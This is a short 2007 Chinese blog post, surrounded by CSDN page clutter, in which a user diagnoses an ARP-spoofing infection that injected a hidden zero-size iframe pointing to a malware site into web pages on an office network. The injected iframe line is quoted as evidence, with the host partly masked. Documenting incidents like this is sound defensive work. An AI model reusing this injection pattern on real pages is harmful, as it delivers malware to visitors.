ARP病毒“吃里巴外”?

最新推荐文章于 2020-04-14 11:23:26 发布
最新推荐文章于 2020-04-14 11:23:26 发布
阅读量3.6k 收藏
点赞数
分类专栏: 系统安全 文章标签: iframe google url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1611620
版权

endurer 原创
2007-05-16 第1

今天上午,我们单位里的电脑,打开国内网站的网页都报病毒

卡巴都报:

/---
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改) URL: hxxp://q***.z*px**5**2*0.com/w***.js
---/

瑞星都报发现:Trojan.DL.VBS.Agent.cogHack.SuspiciousAni

检查这些被报含病毒的网页的源代码,发现头部都被加入了代码:
/---
<iframe src='hxxp://www.z*px**5**2*0.com/0***.htm' width=0 height=0></iframe>                   
---/

比国宝自动在网页加代码还利害……

奇怪的是,打开Google等国外的网站就没事……查看这些国外网站的网页的源代码,没有被加入恶意代码……

难道这病毒还“吃里巴外”?

中午认真排查,发现一根网线,一接到交换机上就出现上述问题,此时网关可以正常Ping通;把这根网线拔掉,网关就Ping不通了,需要重启交换机等设备才能恢复正常。

看来这个病毒发作时,使用ARP欺骗技术,把自身所在的电脑伪装为网关,这样局域网中其它电脑与外网的数据交换都要经过它,病毒就可以往网页数据里加入包含恶意网址代码了。 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络ARP病毒DIY攻克宝典.docx
10-25
网络ARP病毒DIY攻克宝典
检查中ARP病毒的电脑,一堆网游盗号木马Trojan PSW RocOnline变种等
gdfyug的博客
02-13 614
检查中ARP病毒的电脑,一堆网游盗号木马Trojan PSW RocOnline变种等
ARP病毒加的网址传播Trojan-Downloader.Win32.Delf.bjy
caobihole
05-19 82
endurer 原创2007-05-19 第1版 分析了一下 ARP病毒吃里巴外”?http://endurer.bokee.com/6277614.htmlhttp://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspxhttp://blog.sina.com.cn/u/49926d91010008q6 中自动添加的网址...
检查中ARP病毒的电脑,一堆网游盗号木马Trojan.PSW.RocOnline变种等
caobihole
05-22 161
endurer 原创2007-05-22 第1版 今天终于有机会检查那台疑是中了ARP病毒的电脑 ARP病毒吃里巴外”?http://endurer.bokee.com/6277614.htmlhttp://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspxhttp://blog.sina.com.cn/u/49926d91...
linux
weixin_42292005的博客
04-14 173
Linux网络 一,前言 一个运维有时也要和网络打交道,所以具备最基本的网络知识,对一个运维人员来说是必要的。但,对于我们的工作来说这些并不是重点,因此,我不可能从最基础的网络知识开始讲起。本节内容更多是从一个梳理和总结的角度进行阐述。如若同学们遇到不懂,或不明白的地方,那么你要留心了,你有很多基础性的网络知识还不具备,我建议从网上有针对性的学习一下。 二,网络基础学习体系 思科课程体系的大致浏览...
arp.rar_arp_网络病毒
09-23
解除ARP病毒烦恼,还你一个轻松的网络!
服务器ARP病毒的特征及防护说明
09-30
服务器ARP病毒的特征及防护说明
ARP病毒攻击怎么办?
04-25
公司局域网受到ARP病毒攻击,上网断断续续(有时候ping不到网关),我想把网内25台机器都重新安装系统能把故障解决吗?有什么注意事项吗?
计算机病毒与防护:ARP欺骗.ppt
06-10
ARP Cache 在安装了以太网网络适配器(即网卡)或TCP/IP协议的计算机中,都有ARP Cache用来保存IP地址以及解析的MAC地址。 Windows系统默认的ARP缓存表的生存时间是120秒,最大生命期限是10分钟 ARP工作原理 aa:aa:...
node-v10.17.0-linux-x64.tar.xz
最新发布
05-02
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
使用opencv决策树训练mushroom数据集-python源码.zip
05-02
使用opencv决策树训练mushroom数据集-python源码.zip
基于Faster RCNN的人脸检测识别系统python源码+项目说明+wider-face数据集.zip
05-02
基于Faster RCNN的人脸检测识别系统python源码+项目说明+wider_face数据集.zip ### 三,使用说明 1. 锚框的大小为[128、256、512],比率为[1:1、1:2、2:1]。 2. tensorflow的版本是'1.9.0',keras的版本是'2.1.5',除了使用tensorflow2.0之后版本,其他版本都可以尝试。不支持python2.x。 3. 使用的是tensorflow backend,theano可以自行修改。 4. wider face的Label文件格式与VOC2012的label不同,而我使用的Faster RCNN需要VOC2012的格式,所以需要将label文件转换一下格式。具体可以查看 [https://blog.csdn.net/qq_37431083/article/details/102742322](https://blog.csdn.net/qq_37431083/article/details/102742322) 5. 在训练过程中可能会出现`"ValueError: 'a' cannot be empty
1985-2022年广东省企业专利明细数据-专利名称专利类型专利摘要专利授权专利分类号等
05-02
1985-2022年广东省企业专利明细数据-专利名称专利类型专利摘要专利授权专利 分类号等 1、数据说明: 在知识经济时代,技术创新是实现经济内生增长的关键动力, 科技优势成为经济竞争优势的根本源泉。新一轮科技革命和产业变革加速,全球创新速度加 快,我国正在经历发展方式转变、经济结构优化、新旧动能转换的攻关期,创新日益成为破 解发展难题的关键。专利作为技术与知识的载体,其申请数量是创新研究中衡量创新最常用 的指标之一,中国成为创新领先国家也同样体现在专利申请量上。改革开放 40 年来, 我们的知识产权事业取得了举世瞩目的巨大成功,但也面临着“大而不强”的问题。引导专 利从追求数量向提高质量转变,这是国家近几年的政策扶持重点,也是未来专利申请审查的 一个风向标,针对海量专利数据的价值识别与预测,逐渐成为当前的研究热点。 本数据提 供了1985-2022年广东省的企业专利明细数据,可用于各类专利相关研究。 2、 数据来源: 数据来源为国家知识产权局,利用知识产权局的高级检索,选择地区、年份、 专利类型,对全国31省的各类专利进行统计并将检索结果整理为面板数据,包括发明公开 、发明授权、实用
Kaggle竞赛 稻田病害分类-python源码.zip
05-02
Kaggle竞赛 稻田病害分类-python源码.zip
基于paddle+mediapipe注意力机制的表情识别python源码+数据集+模型+项目说明.zip
05-02
文件目录解释 # 1. Models 用来存放的模型,可以是已有的Paddle格式的模型 # 2. Pages - assets 用到的图片资源 - assets.qrc 使用PySide生成的样式文件 - assets_rc.py GUI界面的样式文件,此目录和根目录都有,我忘记是调用的哪一个了,所以都保留了。 # 3. Utils - AttResNet.py 网络代码 - DatasetProcess.py 数据集处理代码 - FaceDetection.py 人脸检测代码 - Predict.py 模型预测代码 - VisualTrain.py 模型训练代码 - CSV文件 用来保存数据集和创建的信息 # 4. Dataset 存放数据集的目录 注意事项 * # 配置好环境,安装使用PySide的工具,不会安装见如下以PyCharm为例的说明 1. 依次点击 File:arrow_right:Settings:arrow_right:Tools:arrow_right:External Tools:arrow_right::heavy_plus_sign:添加PySide工具,
机械设计小线圈生产打蜡机sw20非常好的设计图纸100%好用.zip
05-02
机械设计小线圈生产打蜡机sw20非常好的设计图纸100%好用.zip
手机和讯财金网触屏版自适应手机wap财金网站模板.zip
05-02
触屏版自适应手机wap软件网站模板 触屏版自适应手机wap软件网站模板
基于普中51开发板的超声波测距+蜂鸣器报警 (附开发板原理图)
05-02
基于普中51开发板的超声波测距+蜂鸣器报警 (附开发板原理图) 基于普中51开发板的超声波测距+蜂鸣器报警 (附开发板原理图)
ARP 进程如何使用 IPv4 地址?
05-05
ARP(Address Resolution Protocol)是一个用于将IP地址解析为MAC地址的协议。在IPv4网络中,每个设备都有一个唯一的IP地址和一个唯一的MAC地址。当设备需要与其他设备通信时,它需要知道目标设备的MAC地址。而ARP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值